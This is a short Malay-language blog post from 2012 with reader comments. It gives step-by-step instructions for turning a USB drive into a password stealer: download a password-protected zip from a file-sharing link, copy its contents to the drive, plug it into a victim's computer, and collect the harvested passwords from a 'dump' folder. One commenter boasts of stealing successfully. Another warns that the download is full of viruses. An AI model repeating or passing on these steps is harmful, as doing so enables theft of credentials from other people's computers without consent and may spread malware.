Breaking News
Loading...
Thursday, April 19, 2012

Jadikan pendrive Anda Sebagai Pencuri


Tutorial mudah untuk jadikan pendrive kita sebagai pencuri data (untuk belajar only)

1)download this software http://www.ziddu.com/download/15948037/u...r.zip.html

2 masukan password:velocity

3)masukkan file yang dah di Decompress kedalam USD yang bakal menjadi pencuri.

4)masukkan pendrive tersebut kedalam computer mangsa dan semak file dalam folder dump untuk melihat password

sekian :)
selamat mencuba

5 comments:

hanna華 said...

pastu pe jadi kt file yg dah dicompressed tu?

abdul maLek said...

masuk kan dalam pendrive pastuh ambik pendrive cucuk la dalam computer orang and nak tgok barang yg dah kena curi kita buka dalam folder dump aku dah cuba buat 100% berjaya haha

abdul maLek said...

masuk kan dalam pendrive pastuh ambik pendrive cucuk la dalam computer orang and nak tgok barang yg dah kena curi kita buka dalam folder dump aku dah cuba buat 100% berjaya haha

Anonymous said...

kat mana nak search foleder dump tu ?

azryil adha said...

salam,, bnyak gilerr virus? n aq nak try, tapi baru je download..aq blur..file tu na di compress atau extract?? tapi series,byak gler virus..

Quick Message
Press Esc to close
Copyright © 2013 sAmpan KErTas All Right Reserved